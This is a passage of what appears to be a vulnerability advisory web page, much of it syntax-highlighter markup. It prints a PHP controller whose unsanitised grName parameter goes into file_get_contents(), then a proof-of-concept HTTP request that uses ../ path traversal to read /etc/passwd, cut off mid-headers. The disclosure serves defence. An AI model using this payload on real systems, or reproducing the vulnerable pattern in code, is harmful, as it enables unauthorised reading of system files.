title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> {&#8220;data&#8221;: &#8220;&lt;?php  \/\/vim: ts=2 sw=2    include_once &#8220;db.php&#8221;;  include_once &#8220;base_controller.php&#8221;;    class GrdataController extends BaseController {  \tprotected function signinRequired() {  \t\treturn true;  \t}    \tprotected function doAjaxGet() {  \t\t$response = array();  \t\t$_SESSION[&#8216;curGrPath&#8217;] = $_GET[&#8216;grName&#8217;];  \t\tif (!$this-&gt;isReadable()) {  \t\t\t$this-&gt;renderAjaxError($response, &#8220;permission denied&#8221;);  \t\t\t\/\/ $_SESSION[&#8216;flash&#8217;] = &#8220;permission denied&#8221;;  \t\t\t\/\/ $this-&gt;redirect($this-&gt;makeUrl(&#8220;app\/landing_page.php&#8221;));  \t\t}    \t\t$grName = $_GET[&#8216;grName&#8217;];  \t\t$file = file_get_contents(&#8216;.\/grdata\/&#8217; . $grName); \/\/vuln call to file_get_contents()  \t\tif ($file) {  \t\t\t$response[&#8216;data&#8217;] = $file;  \t\t\t$u = $this-&gt;curUser();  \t\t\t$response[&#8216;actionPermitted&#8217;] = $u-&gt;can(&#8216;write&#8217;, $_GET[&#8216;grName&#8217;]) ? 
&#8216;true&#8217; : &#8216;false&#8217;;  \t\t\tif (!$u-&gt;isAdmin())  \t\t\t\t$response[&#8216;grBlackList&#8217;] = implode(&#8220;,&#8221;, $u-&gt;grBlackList());  \t\t\t\t$response[&#8216;home_page&#8217;] = $u-&gt;attr(&#8216;home_page&#8217;);  \t\t\t\t$this-&gt;renderAjaxSuccess($response);  \t\t}   \t\telse {  \t\t\t$this-&gt;renderAjaxError($response, &#8220;failed to read data file: $grName&#8221;);  \t\t}  \t}  }    $controller = new GrdataController();  $controller-&gt;run();    ?&gt;  &#8220;,&#8221;actionPermitted&#8221;: &#8220;true&#8221;,&#8221;home_page&#8221;: &#8220;&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-12\">12<\/div>\n<div 
class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-58867eb52c074951174095-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-42\">42<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-1\"><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;data&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;<span class=\"crayon-ta\">&lt;?php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-2\"><span class=\"crayon-c\">\/\/vim: ts=2 sw=2<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-4\"><span class=\"crayon-k\">include_once<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;db.php&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-5\"><span class=\"crayon-k\">include_once<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&#8220;base_controller.php&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-7\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GrdataController<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">extends<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BaseController<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-8\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-m\">protected<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">signinRequired<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-9\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-k\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-10\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-m\">protected<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">doAjaxGet<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-13\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-14\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">$_SESSION<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;curGrPath&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;grName&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-15\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">$this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">isReadable<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-16\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">$this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">renderAjaxError<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;permission denied&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-17\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-c\">\/\/ $_SESSION[&#8216;flash&#8217;] = &#8220;permission denied&#8221;;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-18\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-c\">\/\/ $this-&gt;redirect($this-&gt;makeUrl(&#8220;app\/landing_page.php&#8221;));<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-19\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-21\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">$grName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;grName&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-22\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">$file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file_get_contents<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;.\/grdata\/&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$grName<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-c\">\/\/vuln call to file_get_contents()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-23\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$file<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-24\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;data&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$file<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-25\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">$u<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">curUser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-26\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;actionPermitted&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$u<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">can<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;write&#8217;<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;grName&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;true&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;false&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-27\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">$u<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">isAdmin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-28\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;grBlackList&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">implode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;,&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$u<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">grBlackList<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-58867eb52c074951174095-29\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;home_page&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$u<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">attr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;home_page&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-30\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">$this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">renderAjaxSuccess<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-31\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-32\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-33\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">$this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">renderAjaxError<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;failed to read data file: $grName&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-34\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-35\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-36\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-38\"><span class=\"crayon-v\">$controller<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GrdataController<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-39\"><span class=\"crayon-v\">$controller<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">run<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-41\"><span class=\"crayon-ta\">?&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-42\"><span class=\"crayon-s\">&#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;actionPermitted&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;true&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;home_page&#8221;<\/span><span 
class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><u><em>Proof of Concept<\/em><\/u><\/p>\n<p>An attacker sending the following request:<\/p>\n<\/p>\n<div id=\"crayon-58867eb52c078469555230\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" 
class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/sdcard\/cpt\/app\/grdata.php?grName=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd HTTP\/1.1  Host: 192.168.0.16  Accept: application\/json, text\/javascript, *\/*; q=0.01  X-Requested-With: XMLHttpRequest  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/49.0.2623.75 Safari\/537.36  Referer: http:\/\/192.168.0.16\/sdcard\/cpt\/app\/graphic.php?grname=Admin.gr  Accept-Encoding: gzip, deflate, sdch  Accept-Language: en-US,en;q=0.8  Cookie: PHPSESSID=7384531ce6f444710b42106a07b91e4c; PHPSESSID=7384531ce6f444710b42106a07b91e4c  Connection: close<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c078469555230-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c078469555230-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c078469555230-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c078469555230-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c078469555230-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c078469555230-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c078469555230-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c078469555230-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c078469555230-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-58867eb52c078469555230-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb52c078469555230-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sdcard<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cpt<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">grdata<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">grName<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">passwd <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-58867eb52c078469555230-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.0.16<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c078469555230-3\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">json<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">javascript<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.01<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c078469555230-4\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requested<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">With<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c078469555230-5\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span 
